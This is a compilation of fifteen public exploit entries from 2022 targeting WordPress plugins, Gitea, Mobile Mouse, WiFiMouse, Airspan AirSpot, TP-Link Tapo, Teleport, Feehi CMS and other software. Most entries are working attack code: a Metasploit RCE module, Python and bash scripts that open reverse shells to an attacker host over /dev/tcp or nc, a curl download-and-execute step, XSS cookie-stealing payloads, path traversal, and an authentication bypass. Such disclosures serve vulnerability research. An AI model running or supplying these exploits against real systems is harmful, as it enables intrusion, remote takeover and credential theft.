
  1. # Exploit Title: WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS) # Date: 05/08/2022 # Exploit Author: saitamang , yunaranyancat , syad # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/plugins/testimonial-slider-and-showcase/ # Version: 2.2.6 # Tested on: Centos 7 apache2 + MySQL WordPress Plugin "Testimonial Slider and Showcase" is prone to a cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Testimonial Slider and Showcase" version 2.2.6 is vulnerable; prior versions may also be affected. Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post payload --> test"/><img/src=""/onerror=alert(document.cookie)> The draft post can be viewed using the Editor account or Admin account and XSS will be triggered once clicked.
  2. # Exploit Title: WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS) # Date: 08/08/2022 # Exploit Author: saitamang, syad, yunaranyancat # Vendor Homepage: wordpress.org # Software Link: https://downloads.wordpress.org/plugin/netroics-blog-posts-grid.zip # Version: 1.0 # Tested on: Centos 7 apache2 + MySQL WordPress Plugin "Netroics Blog Posts Grid" is prone to a stored cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Netroics Blog Posts Grid" version 1.0 is vulnerable; prior versions may also be affected. Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post payload --> user s1"><img src=x onerror=alert(document.cookie)>.gif The draft post can be viewed using other Editor or Admin account and Stored XSS will be triggered.
  3. # Exploit Title: Gitea Git Fetch Remote Code Execution # Date: 09/14/2022 # Exploit Author: samguy # Vendor Homepage: https://gitea.io # Software Link: https://dl.gitea.io/gitea/1.16.6 # Version: <= 1.16.6 # Tested on: Linux - Debian # Ref : https://tttang.com/archive/1607/ # CVE : CVE-2022-30781 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'Gitea Git Fetch Remote Code Execution', 'Description' => %q{ This module exploits Git fetch command in Gitea repository migration process that leads to a remote command execution on the system. This vulnerability affect Gitea before 1.16.7 version. }, 'Author' => [ 'wuhan005 & li4n0', # Original PoC 'krastanoel' # MSF Module ], 'References' => [ ['CVE', '2022-30781'], ['URL', 'https://tttang.com/archive/1607/'] ], 'DisclosureDate' => '2022-05-16', 'License' => MSF_LICENSE, 'Platform' => %w[unix win], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [] } ) ) register_options([ Opt::RPORT(3000), OptString.new('TARGETURI', [true, 'Base path', '/']), OptString.new('USERNAME', [true, 'Username to authenticate with']), OptString.new('PASSWORD', [true, 'Password to use']), OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait', 12]) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/user/login'), 
'keep_cookies' => true ) return CheckCode::Unknown('No response from the web service') if res.nil? return CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200 # Powered by Gitea Version: 1.16.6 unless (match = res.body.match(/Gitea Version: (?<version>[\da-zA-Z.]+)/)) return CheckCode::Unknown('Target does not appear to be running Gitea.') end if match[:version].match(/[a-zA-Z]/) return CheckCode::Unknown("Unknown Gitea version #{match[:version]}.") end res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/user/login'), 'vars_post' => { 'user_name' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], '_csrf' => get_csrf(res.get_cookies) }, 'keep_cookies' => true ) return CheckCode::Safe('Authentication failed') if res&.code != 302 if Rex::Version.new(match[:version]) <= Rex::Version.new('1.16.6') return CheckCode::Appears("Version detected: #{match[:version]}") end CheckCode::Safe("Version detected: #{match[:version]}") rescue ::Rex::ConnectionError return CheckCode::Unknown('Could not connect to the web service') end def primer ['/api/v1/version', '/api/v1/settings/api', "/api/v1/repos/#{@migrate_repo_path}", "/api/v1/repos/#{@migrate_repo_path}/pulls", "/api/v1/repos/#{@migrate_repo_path}/topics" ].each { |uri| hardcoded_uripath(uri) } # adding resources vprint_status("Creating repository \"#{@repo_name}\"") gitea_create_repo vprint_good('Repository created') vprint_status("Migrating repository") gitea_migrate_repo end def exploit @repo_name = rand_text_alphanumeric(6..15) @migrate_repo_name = rand_text_alphanumeric(6..15) @migrate_repo_path = "#{datastore['username']}/#{@migrate_repo_name}" datastore['URIPATH'] = "/#{@migrate_repo_path}" Timeout.timeout(datastore['HTTPDELAY']) { super } rescue Timeout::Error [@repo_name, @migrate_repo_name].map { |name| gitea_remove_repo(name) } cleanup # removing all resources end def get_csrf(cookies) csrf = cookies&.split("; 
")&.grep(/_csrf=/)&.join&.split("=")&.last fail_with(Failure::UnexpectedReply, 'Unable to get CSRF token') unless csrf csrf end def gitea_remove_repo(name) vprint_status("Cleanup: removing repository \"#{name}\"") uri = "/#{datastore['username']}/#{name}/settings" res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, uri), 'keep_cookies' => true ) res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'action' => 'delete', 'repo_name' => name, '_csrf' => get_csrf(res.get_cookies) }, 'keep_cookies' => true ) vprint_warning('Unable to remove repository') if res&.code != 302 end def gitea_create_repo uri = normalize_uri(target_uri.path, '/repo/create') res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => true) @uid = res&.get_html_document&.at('//input[@id="uid"]/@value')&.text fail_with(Failure::UnexpectedReply, 'Unable to get repo uid') unless @uid res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'uid' => @uid, 'auto_init' => 'on', 'readme' => 'Default', 'repo_name' => @repo_name, 'trust_model' => 'default', 'default_branch' => 'master', '_csrf' => get_csrf(res.get_cookies) }, 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Unable to create repo') if res&.code != 302 rescue ::Rex::ConnectionError return CheckCode::Unknown('Could not connect to the web service') end def gitea_migrate_repo res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/repo/migrate'), 'keep_cookies' => true ) uri = res&.get_html_document&.at('//svg[@class="svg gitea-gitea"]/ancestor::a/@href')&.text fail_with(Failure::UnexpectedReply, 'Unable to get Gitea service type') unless uri svc_type = Rack::Utils.parse_query(URI.parse(uri).query)['service_type'] res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, uri), 'keep_cookies' => true ) res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'uid' => @uid, 
'service' => svc_type, 'pull_requests' => 'on', 'repo_name' => @migrate_repo_name, '_csrf' => get_csrf(res.get_cookies), 'auth_token' => rand_text_alphanumeric(6..15), 'clone_addr' => "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}", }, 'keep_cookies' => true ) if res&.code != 302 # possibly triggered by the [migrations] settings err = res&.get_html_document&.at('//div[contains(@class, flash-error)]/p')&.text gitea_remove_repo(@repo_name) cleanup fail_with(Failure::UnexpectedReply, "Unable to migrate repo: #{err}") end rescue ::Rex::ConnectionError return CheckCode::Unknown('Could not connect to the web service') end def on_request_uri(cli, req) case req.uri when '/api/v1/version' send_response(cli, '{"version": "1.16.6"}') when '/api/v1/settings/api' data = { 'max_response_items':50,'default_paging_num':30, 'default_git_trees_per_page':1000,'default_max_blob_size':10485760 } send_response(cli, data.to_json) when "/api/v1/repos/#{@migrate_repo_path}" data = { "clone_url": "#{full_uri}#{datastore['username']}/#{@repo_name}", "owner": { "login": datastore['username'] } } send_response(cli, data.to_json) when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1" send_response(cli, '{"topics":[]}') when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all" data = [ { "base": { "ref": "master", }, "head": { "ref": "--upload-pack=#{payload.encoded}", "repo": { "clone_url": "./", "owner": { "login": "master" }, } }, "updated_at": "2001-01-01T05:00:00+01:00", "user": {} } ] send_response(cli, data.to_json) end end end
  4. # Exploit Title: Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE) # Date: Aug 09, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://mobilemouse.com/ # Software Link: https://www.mobilemouse.com/downloads/setup.exe # Version: 3.6.0.4 # Tested on: Windows 10 Enterprise LTSC Build 17763 #!/usr/bin/env python3 import socket from time import sleep import argparse help = " Mobile Mouse 3.6.0.4 Remote Code Execution " parser = argparse.ArgumentParser(description=help) parser.add_argument("--target", help="Target IP", required=True) parser.add_argument("--file", help="File name to Upload") parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1") args = parser.parse_args() host = args.target command_shell = args.file lhost = args.lhost port = 9099 # Default Port s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04") s.send(CONN) run = s.recv(54) RUN = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN) run = s.recv(54) sleep(0.5) download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8') hex_shell = download_string.hex() SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" + "4b45591e2d311e454e5445521e04") s.send(SHELL) shell = s.recv(96) print ("Executing The Command Shell...") sleep(1.2) RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN2) run2 = s.recv(54) shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8') hex_run = shell_string.hex() RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" + "4b45591e2d311e454e5445521e04") s.send(RUN3) run3 = s.recv(96) print (" Take The Rose") sleep(10) s.close()
  5. # Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE) # Date: 7/26/2022 # Exploit Author: Samy Younsi (NSLABS) (https://samy.link) # Vendor Homepage: https://www.airspan.com/ # Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf # Version: 0.3.4.1-4 and under. # Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu) # CVE : CVE-2022-36267 from __future__ import print_function, unicode_literals import argparse import requests import urllib3 urllib3.disable_warnings() def banner(): airspanLogo = """ ,-. / \ `. __..-,O : \ --''_..-'.' | . .-' `. '. : . .`.' \ `. / .. \ `. ' . `, `. \ ,|,`. `-.\ '.|| ``-...__..-` | | Airspan |__| AirSpot 5410 /||\ PWNED x_x //||\\ // || \\ __//__||__\\__ '--------------'Necrum Security Labs \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(airspanLogo)) def pingWebInterface(RHOST, RPORT): url = 'https://{}:{}'.format(RHOST, RPORT) try: response = requests.get(url, allow_redirects=False, verify=False, timeout=30) if response.status_code != 200: print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() print('[INFO] Airspan device web interface seems reachable!') except: print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() def execReverseShell(RHOST, RPORT, LHOST, LPORT): payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT) data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload) try: print('[INFO] Executing reverse shell...') response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False) print("Reverse shell successfully executed. 
{}:{}".format(LHOST, LPORT)) return except Exception as e: print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT) return False def main(): banner() args = parser.parse_args() pingWebInterface(args.RHOST, args.RPORT) execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False) parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True) parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True) parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) main()
  6. # Exploit Title: Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass # Date: 2022-08-11 # Exploit Author: JORDAN GLOVER # Type: WEBAPPS # Platform: HARDWARE # Vendor Homepage: https://www.buffalotech.com/ # Model: TeraStation Series # Firmware Version: 1.66 # Tested on: Windows 10 An authentication bypass vulnerability found within the web interface of a Buffalo TeraStation Series Network Attached Storage (NAS) device allows an unauthenticated malicious actor to gain administrative privileges. The web interface can be accessed over port 80 or 443 from a web browser. Once accessed, you are presented with a login page that requires a username and password to authenticate to the NAS. Using a proxy tool to intercept the requests and responses, it was possible to intercept the login response and modify the JSON data contained within the body. Changing "success" to 'true' and "pageMode" to '0' in that response grants authentication to the NAS with administrator privileges. 
POC #1 Authentication Failure Request POST /dynamic.pl HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 45 Origin: http://localhost Connection: close Referer: http://localhost/static/index.html bufaction=verifyLogin&user=Jordan&password=Jordan Response HTTP/1.1 200 OK Content-type: text/html Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Date: Mon, 30 Jun 2008 02:39:51 GMT Server: lighttpd/1.4.32 Content-Length: 94 {"success":false,"errors":[],"data":[{"sid":"zz69c1c4d83023374d0b786d7a5y69b0","pageMode":2}]} Incorrect Username or Password POC #2 Authentication Success Request POST /dynamic.pl HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 45 Origin: http://localhost Connection: close Referer: http://localhost/static/index.html bufaction=verifyLogin&user=Jordan&password=Jordan Intercepted Response HTTP/1.1 200 OK Content-type: text/html Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Date: Mon, 30 Jun 2008 02:39:51 GMT Server: lighttpd/1.4.32 Content-Length: 94 {"success":true,"errors":[],"data":[{"sid":"ag69c5f4x43093374d0c786k7a9y59h0","pageMode":0}]} Login Successful
  7. # Exploit Title: Bookwyrm v0.4.3 - Authentication Bypass # Date: 2022-08-4 # Exploit Author: Akshay Ravi # Vendor Homepage: https://github.com/bookwyrm-social/bookwyrm # Software Link: https://github.com/bookwyrm-social/bookwyrm/releases/tag/v0.4.3 # Version: <= 4.0.3 # Tested on: MacOS Monterey # CVE: CVE-2022-2651 # Original Report Link: https://huntr.dev/bounties/428eee94-f1a0-45d0-9e25-318641115550/ Description: Email Verification Bypass Leads To Account Takeover in bookwyrm-social/bookwyrm v0.4.3 Due To Lack Of Rate-Limit Protection # Steps to reproduce: 1. Create an account with the victim's email address 2. When the account is created, it asks for email confirmation by validating an OTP Endpoint: https://site/confirm-email 3. Enter any random OTP and repeat the attempt (brute force); because the endpoint is not rate-limited, a matching OTP allows the account to be taken over
  8. // Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption // Date: 2022-08-12 // Exploit Author: p1ckzi // Vendor Homepage: https://thingm.com/ // Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7 // Vulnerable Version: blink1control2 <= 2.2.7 // Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11. // CVE: CVE-2022-35513 // // Description: // the blink1control2 app (versions <= 2.2.7) utilises an insecure method // of password storage which can be found by accessing the /blink1/input url // of the api server. // password ciphertext for skype logins and email are listed // and can be decrypted. example usage: // node blink1-pass-decrypt <ciphertext> #!/usr/bin/env node const {ArgumentParser} = require('argparse'); const simpleCrypt = require('simplecrypt'); function exploit() { const BANNER = '\033[36m\n\ _ _ _ _ _\n\ | |__ | (_)_ __ | | _/ | _ __ __ _ ___ ___\n\ | \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\ | |_) | | | | | | <| |_____| |_) | (_| \\__ \\__ |_____|\n\ |_.__/|_|_|_| |_|_|\\_|_| | .__/ \\__,_|___|___/\n\ |_|\n\ _ _\n\ __| | ___ ___ _ __ _ _ _ __ | |_\n\ / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\ | (_| | __| (__| | | |_| | |_) | |_\n\ \\__,_|\\___|\\___|_| \\__, | .__/ \\__|\n\ |___/|_|\033[39m'; const PARSER = new ArgumentParser({ description: 'decrypts passwords found at the /blink/input url ' + 'of the blink1control2 api server (version <= 2.2.7 ).' 
}); PARSER.add_argument('ciphertext', { help: 'encrypted password string to use', type: 'str' }); let args = PARSER.parse_args(); // supplied ciphertext is decrypted with same salt, password, and method // used for encryption: try { let crypt = simpleCrypt({ salt: 'boopdeeboop', password: 'blink1control', method: 'aes-192-ecb' }); let ciphertext = args.ciphertext; let decrypted = crypt.decrypt(ciphertext); console.log(BANNER); console.log('\033[32m[+] decrypted password:\033[39m'); console.log(decrypted); } catch (TypeError) { console.log('\033[33m[!] the submitted hash was invalid.\033[39m'); } finally { process.exit(1); } } exploit()
  9. # Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion # Date: Aug 13, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: http://www.savysoda.com # Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976 # Version: 11 # Tested on: iPhone OS 15_5 # Proof of Concept GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1 Host: 192.168.1.100 Connection: close Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1 Referer: http://192.168.1.103/ Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate ----------------- HTTP/1.1 200 OK Content-Disposition: attachment Content-Type: application/download Content-Length: 213 Accept-Ranges: bytes Date: Sat, 13 Aug 2022 03:33:30 GMT ## # Host Database # # localhost is used to configure the loopback interface # when the system is booting. Do not change this entry. ## 127.0.0.1 localhost 255.255.255.255 broadcasthost ::1 localhost
  10. # Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE) # Date: 15-08-2022 # Author: Febin # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.8.3.4 # Tested on: Windows 10 #!/bin/bash printf " WiFiMouse / MouseServer 1.8.3.4 Exploit by FEBIN " printf "[*] Enter the Target IP Address: " read TARGET rce(){ printf "[*] Enter the Command to execute on the Target: " read CMD sh -c "echo 'key 9[R] WIN d';sleep 1;echo 'key 9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978 } dirlist(){ echo "[*] User's Home Directory Contents:" echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2- while $true do printf "\nList Directory:> " read DIR echo "[+] Contents of $DIR: " echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2- done } printf " [1] Remote Command Execution [2] Directory Listing " printf "Enter Your Choice (1 or 2) : " read CHOICE if [[ $CHOICE == "1" ]] then rce elif [[ $CHOICE == "2" ]] then dirlist else echo "[-] Invalid Choice!" fi
  11. # Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) # Date: 02/11/2022 # Exploit Author: hacefresko # Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/ # Version: 1.1.15 and below # Tested on: 1.1.11, 1.1.14 and 1.1.15 # CVE : CVE-2021-4045 # Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce import requests, urllib3, sys, threading, os urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) PORT = 1337 REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f' NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version) if len(sys.argv) < 3: print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>") exit() victim = sys.argv[1] attacker = sys.argv[2] print("[+] Listening on %d" % PORT) t = threading.Thread(target=os.system, args=(NC_COMMAND,)) t.start() print("[+] Serving payload to %s\n" % victim) url = "https://" + victim + ":443/" json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}} requests.post(url, json=json, verify=False)
  12. # Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated) # Date: 22-08-2022 # Exploit Author: yuyudhn # Vendor Homepage: https://feehi.com/ # Software Link: https://github.com/liufee/cms # Version: 2.1.1 (REQUIRED) # Tested on: Linux, Docker # CVE : CVE-2022-34140 # Proof of Concept: 1. Login using admin account at http://feehi-cms.local/admin 2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex 3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate 4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php. 5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php # Burp request example: POST /admin/index.php?r=ad%2Fcreate HTTP/1.1 Host: feehi-cms.local Content-Length: 1530 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://feehi-cms.local Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; 
_csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D Connection: close ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="_csrf_backend" FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg== ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[name]" rce ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[tips]" rce at Ad management ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[input_type]" 1 ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[ad]" ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php" Content-Type: image/png <?php phpinfo(); ------WebKitFormBoundaryFBYJ8wfp9LBoF4xg Content-Disposition: form-data; name="AdForm[link]" --------------
  13. # Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE) # Date: 08/01/2022 # Exploit Author: Brandon Roach & Brian Landrum # Vendor Homepage: https://goteleport.com # Software Link: https://github.com/gravitational/teleport # Version: < 10.1.2 # Tested on: Linux # CVE: CVE-2022-36633 Proof of Concept (payload): https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2= f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3= 0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?= method=3Diam Decoded payload: " /bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #
  14. # Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/wp-useronline/ # Date: 2022-08-24 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: https://github.com/lesterchan/wp-useronline # Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip # Category: Web Application # Version: 2.88.0 # Tested on: Debian / WordPress 6.0.1 # CVE : CVE-2022-2941 # Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c # 1. Technical Description: The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions up to, and including 2.88.0. This is due to the fact that all fields in the “Naming Conventions” section do not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers, with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user accesses the injected page. # 2. Proof of Concept (PoC): a. Install and activate version 2.88.0 of the plugin. b. Go to the plugin options panel (http://[TARGET]/wp-admin/options-general.php?page=useronline-settings). c. Identify the "Naming Conventions" section and type your payload in any of the existing fields. You can use the following payload: <script>alert(/XSS/)</script> d. Save the changes and now go to the Dashboard/WP-UserOnline option. As soon as you click here, your payload will be executed. Note: This change will be permanent until you modify the edited fields.
  15. # Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/ # Date: 2022-08-24 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: https://profiles.wordpress.org/3dady/ # Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip # Category: Web Application # Version: 1.0 # Tested on: Debian / WordPress 6.0.1 # CVE : N/A # 1. Technical Description: The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of JavaScript code that can exploit the vulnerability. # 2. Proof of Concept (PoC): a. Install and activate version 1.0 of the plugin. b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady). c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text): " autofocus onfocus=alert(/XSS/)> d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed. Note: This change will be permanent until you modify the edited fields.
